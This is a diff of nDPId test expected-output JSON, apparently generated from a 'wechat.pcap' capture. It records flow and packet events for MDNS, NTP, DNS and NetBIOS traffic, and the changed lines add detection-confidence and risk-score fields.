-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171250302,"pkt":"AQBeAAD7eJKcD6iOCABFAABESuZAAAERi7jAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171251303,"pkt":"AQBeAAD7eJKcD6iOCABFAABESy5AAAERi3DAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492171251303,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
-00649{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1492171267294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJBJAAEARkeHAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1492171267430,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1492171267430,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJlBAAEARj6bAqAFnwKgB\/uivADUALYbgc9oBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1492171268427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1492171268427,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJl5AAEARj5jAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1492171268754,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1492171268754,"pkt":"8IQvSpdgeJKcD6iOCABFAABIJm1AAEARj4LAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1492171269383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1492171269383,"pkt":"8IQvSpdgeJKcD6iOCABFAABDJn9AAEARj3XAqAFnwKgB\/qwfADUALz4De5MBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwAAAQAB"}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1492171269383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1492171269383,"pkt":"8IQvSpdgeJKcD6iOCABFAABDJoBAAEARj3TAqAFnwKgB\/qwfADUAL2b9N5kBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1492171269548,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"ts_msec":1492171269548,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwL\/IAAIARhLfAqAFkwKgB\/wCKAIoA3H89EQ7\/KMCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="}
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
